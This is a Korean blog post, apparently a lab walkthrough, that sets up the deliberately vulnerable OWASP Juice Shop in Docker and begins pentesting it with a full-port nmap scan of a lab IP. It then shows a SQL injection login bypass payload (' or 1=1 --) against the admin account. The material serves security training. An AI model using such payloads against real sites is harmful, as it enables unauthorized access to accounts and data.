728x90
반응형
| 업데이트 |
| yum update -y |
| docker 설치 |
| yum install -y docker |
| systemctl restart docker |
| docker 이미지설치 |
| docker pull bkimminich/juice-shop |
| ip확인 (현재 1.25) |
| docker 실행 및 서비스 포트 설정 |
| docker run -p 3000:3000 bkimminich/juice-shop |
 |
Systemc pentest(juice-shop : node.js → 자바스크립트 기반)
- Scanning (Nmap, Nikto, Zap 등): 전체 포트 스캐닝
- Web Service Port Surfing
- Directory Browsing
- OWASP TOP 10 취약점 공격
- MSFConsole /Sqlmap / Zap /Burp Suite /Brute Force 등을 통한 공격
참고 링크
https://blog.sunggwanchoi.com/owasp-juiceshop-euro-alaboneun-owasp-top-10-0-hwangyeonggucug/
| 모든 포트 nmap 스캔 |
| nmap -p- -A 192.168.1.25 |
1. INJECTION
ID: admin@juice_sh.op’
PW: asdf’
둘 다 작은따옴표 입력 후 로그인 시도.
도전과제는 풀었지만 Error Handling이 뜬다.
로그인 시도를 위해서 모든 값을 true로 만들어주는 1=1 구문을 추가해서 넣어본다.
ID: admin@juice_sh.op’ or 1=1 --
PW: asdf’
로그인 성공
728x90
반응형
'해킹 > OWASP Juice-shop 모의해킹' 카테고리의 다른 글
| OWASP Juice Shop 03 (0) | 2023.04.17 |
|---|---|
| OWASP Juice Shop 02 (0) | 2023.04.17 |